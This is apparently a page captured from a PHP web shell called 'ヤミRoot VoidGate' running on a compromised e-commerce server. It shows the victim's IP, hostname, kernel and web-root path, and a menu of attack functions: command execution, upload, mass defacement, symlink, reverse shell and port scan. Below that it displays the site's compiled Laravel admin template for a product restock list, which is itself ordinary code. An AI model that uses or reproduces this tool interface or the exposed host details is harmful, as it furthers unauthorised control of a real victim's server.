ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: 054be4569035c039addd7093ab350e22.php
<?php $__env->startSection('title', translate('restock_product_List')); ?> <?php $__env->startSection('content'); ?> <div class="content container-fluid"> <div class="mb-3"> <h2 class="h1 mb-0 text-capitalize d-flex align-items-center gap-2"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/inhouse-product-list.png')); ?>" alt=""> <?php echo e(translate('Request_Restock_List')); ?> <span class="badge text-dark bg-body-secondary fw-semibold rounded-50"><?php echo e($totalRestockProducts); ?></span> </h2> </div> <div class="card"> <div class="card-body"> <form action="<?php echo e(url()->current()); ?>" method="GET"> <input type="hidden" value="<?php echo e(request('status')); ?>" name="status"> <div class="row g-2"> <div class="col-12"> <h3 class="mb-3"><?php echo e(translate('filter_Products')); ?></h3> </div> <?php if(request('type') == 'seller'): ?> <div class="col-sm-6 col-lg-6 col-xxl-3"> <div class="form-group"> <label class="form-label" for="store"><?php echo e(translate('store')); ?></label> <select name="seller_id" class="custom-select"> <option value="" selected><?php echo e(translate('all_store')); ?></option> <?php $__currentLoopData = $sellers; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $seller): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($seller->id); ?>"<?php echo e(request('seller_id') == $seller->id ? 'selected' : ''); ?>> <?php echo e($seller->shop->name); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <?php endif; ?> <div class="col-sm-6 col-lg-6 col-xxl-3"> <div class="form-group"> <label class="form-label" for="store"><?php echo e(translate('Request_Restock_Date')); ?></label> <div class="position-relative"> <span class="fi fi-sr-calendar icon-absolute-on-right"></span> <input type="text" class="js-daterangepicker previous-date-true placeholder-mode-true form-control" name="restock_date" placeholder="<?php echo e(translate('Select_Date')); ?>" value="<?php echo e(request('restock_date')); ?>" autocomplete="off"> </div> </div> </div> <div class="col-sm-6 col-lg-6 col-xxl-3"> <div class="form-group"> <label for="name" class="form-label"><?php echo e(translate('category')); ?></label> <select class="custom-select action-get-request-onchange" name="category_id" data-url-prefix="<?php echo e(url('/admin/products/get-categories?parent_id=')); ?>" data-element-id="sub-category-select" data-element-type="select"> <option value="<?php echo e(old('category_id')); ?>" selected disabled> <?php echo e(translate('select_category')); ?></option> <?php $__currentLoopData = $categories; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $category): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($category['id']); ?>" <?php echo e(request('category_id') == $category['id'] ? 'selected' : ''); ?>> <?php echo e($category['defaultName']); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="col-sm-6 col-lg-6 col-xxl-3"> <div class="form-group"> <label for="name" class="form-label"><?php echo e(translate('sub_Category')); ?></label> <select class="custom-select action-get-request-onchange" name="sub_category_id" id="sub-category-select" data-url-prefix="<?php echo e(url('/admin/products/get-categories?parent_id=')); ?>" data-element-id="sub-sub-category-select" data-element-type="select"> <option disabled <?php echo e(request('sub_category_id') ? '' : 'selected'); ?>> <?php echo e(translate('select_Sub_Category')); ?> </option> <?php $__currentLoopData = $subCategories; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $subCategoryItem): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($subCategoryItem['id']); ?>" <?php echo e(request('sub_category_id') == $subCategoryItem['id'] ? 'selected' : ''); ?>> <?php echo e($subCategoryItem['defaultName']); ?> </option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="col-sm-6 col-lg-6 col-xxl-3"> <div class="form-group"> <label class="form-label" for="store"><?php echo e(translate('brand')); ?></label> <select name="brand_id" class="custom-select"> <option value="" selected><?php echo e(translate('select_brand')); ?></option> <?php $__currentLoopData = $brands; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $brand): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($brand->id); ?>" <?php echo e(request('brand_id') == $brand->id ? 'selected' : ''); ?>> <?php echo e($brand->default_name); ?></option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="col-12"> <div class="d-flex gap-3 justify-content-end mt-4"> <a href="<?php echo e(route('admin.products.request-restock-list')); ?>" class="btn btn-secondary px-4"> <?php echo e(translate('reset')); ?> </a> <button type="submit" class="btn btn-primary px-4 action-get-element-type"> <?php echo e(translate('show_data')); ?> </button> </div> </div> </div> </form> </div> </div> <div class="mt-20"> <div class="card"> <div class="px-3 py-4 d-flex justify-content-between align-items-center gap-20 flex-wrap"> <h3 class="mb-0"> <?php echo e(translate('request_list')); ?> <span class="badge text-dark bg-body-secondary fw-semibold rounded-50"><?php echo e($restockProducts->total()); ?></span> </h3> <div class="d-flex flex-wrap gap-3 align-items-center justify-content-sm-end flex-grow-1"> <div class="min-w-300 min-w-100-mobile"> <form action="<?php echo e(url()->current()); ?>" method="GET"> <div class="input-group"> <input type="hidden" name="restock_date" value="<?php echo e(request('restock_date')); ?>"> <input type="hidden" name="category_id" value="<?php echo e(request('category_id')); ?>"> <input type="hidden" name="sub_category_id" value="<?php echo e(request('sub_category_id')); ?>"> <input type="hidden" name="brand_id" value="<?php echo e(request('brand_id')); ?>"> <input id="datatableSearch_" type="search" name="searchValue" class="form-control" placeholder="<?php echo e(translate('search_by_Product_Name')); ?>" aria-label="Search orders" value="<?php echo e(request('searchValue')); ?>"> <div class="input-group-append search-submit"> <button type="submit"> <i class="fi fi-rr-search"></i> </button> </div> </div> </form> </div> <div class="dropdown"> <a type="button" class="btn btn-outline-primary" href="<?php echo e(route('admin.products.restock-export', ['restock_date' => request('restock_date'), 'brand_id' => request('brand_id'), 'category_id' => request('category_id'), 'sub_category_id' => request('sub_category_id'), 'searchValue' => request('searchValue')])); ?>"> <i class="fi fi-sr-inbox-in"></i> <span class="fs-12"><?php echo e(translate('export')); ?></span> </a> </div> </div> </div> <div class="table-responsive"> <table id="datatable" class="table table-hover table-borderless table-thead-bordered align-middle"> <thead class="text-capitalize"> <tr> <th><?php echo e(translate('SL')); ?></th> <th><?php echo e(translate('product_name')); ?></th> <th class="text-center"><?php echo e(translate('selling_price')); ?></th> <th class="text-center"><?php echo e(translate('last_request_date')); ?></th> <th class="text-center"><?php echo e(translate('number_of_request')); ?></th> <th class="text-center"><?php echo e(translate('action')); ?></th> </tr> </thead> <tbody> <?php $__currentLoopData = $restockProducts; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $restockProduct): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <th scope="row"> <?php echo e($restockProducts->firstItem() + $key); ?></th> <td> <a href="<?php echo e(route('admin.products.view', ['addedBy' => $restockProduct->product['added_by'] == 'seller' ? 'vendor' : 'in-house', 'id' => $restockProduct->product['id'] ?? 0])); ?>" class="media align-items-center gap-2"> <img src="<?php echo e(getStorageImages(path: $restockProduct?->product?->thumbnail_full_url, type: 'backend-product')); ?>" class="avatar border object-fit-cover" alt=""> <span class="media-body text-dark text-primary-hover"> <?php echo e(Str::limit($restockProduct->product['name'] ?? '', 20)); ?> <p class="small fw-bold m-0"> <?php if($restockProduct['variant']): ?> <?php echo e(translate('Variant:') . ' ' . $restockProduct['variant']); ?> <?php endif; ?> </p> </span> </a> </td> <td class="text-center"> <?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $restockProduct->product['unit_price'] ?? 0), currencyCode: getCurrencyCode())); ?> </td> <td class="text-center"> <?php echo e($restockProduct->updated_at->format('d F Y, h:i A')); ?> </td> <td class="text-center"> <?php echo e($restockProduct?->restockProductCustomers?->count() ?? 0); ?> </td> <td> <div class="d-flex justify-content-center gap-2"> <a class="btn btn-outline-info icon-btn" title="View" href="<?php echo e(route('admin.products.view', ['addedBy' => $restockProduct->product['added_by'] == 'seller' ? 'vendor' : 'in-house', 'id' => $restockProduct->product['id'] ?? 0])); ?>"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/icons/restock_view.svg')); ?>" alt=""> </a> <a class="btn btn-outline-primary icon-btn action-update-product-quantity" title="<?php echo e(translate('edit')); ?>" id="<?php echo e($restockProduct->product['id']); ?>" data-url="<?php echo e(route('admin.products.get-variations', ['id' => $restockProduct->product['id'], 'restock_id' => $restockProduct->id])); ?>" data-bs-target="#update-stock"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/icons/restock_update.svg')); ?>" alt=""> </a> <span class="btn btn-outline-danger icon-btn delete-data" title="<?php echo e(translate('delete')); ?>" data-id="product-<?php echo e($restockProduct->id); ?>"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/icons/restock_delete.svg')); ?>" alt=""> </span> </div> <form action="<?php echo e(route('admin.products.restock-delete', [$restockProduct->id])); ?>" method="post" id="product-<?php echo e($restockProduct->id); ?>"> <?php echo csrf_field(); ?> <?php echo method_field('delete'); ?> </form> </td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </tbody> </table> </div> <div class="table-responsive mt-4"> <div class="px-4 d-flex justify-content-lg-end"> <?php echo e($restockProducts->links()); ?> </div> </div> <?php if(count($restockProducts) == 0): ?> <?php echo $__env->make( 'layouts.admin.partials._empty-state', ['text' => 'no_product_found'], ['image' => 'default'] , array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <?php endif; ?> </div> </div> </div> <span id="message-select-word" data-text="<?php echo e(translate('select')); ?>"></span> <div class="modal fade update-stock-modal restock-stock-update" id="update-stock" tabindex="-1"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <form action="<?php echo e(route('admin.products.update-quantity')); ?>" method="post" class="odal-body p-20"> <?php echo csrf_field(); ?> <div class="rest-part-content"></div> <div class="d-flex justify-content-end gap-10 flex-wrap align-items-center"> <button type="button" class="btn btn-danger px-4" data-bs-dismiss="modal" aria-label="Close"> <?php echo e(translate('close')); ?> </button> <button class="btn btn-primary px-4" type="submit"> <?php echo e(translate('update')); ?> </button> </div> </form> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.admin.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/product/request-restock-list.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick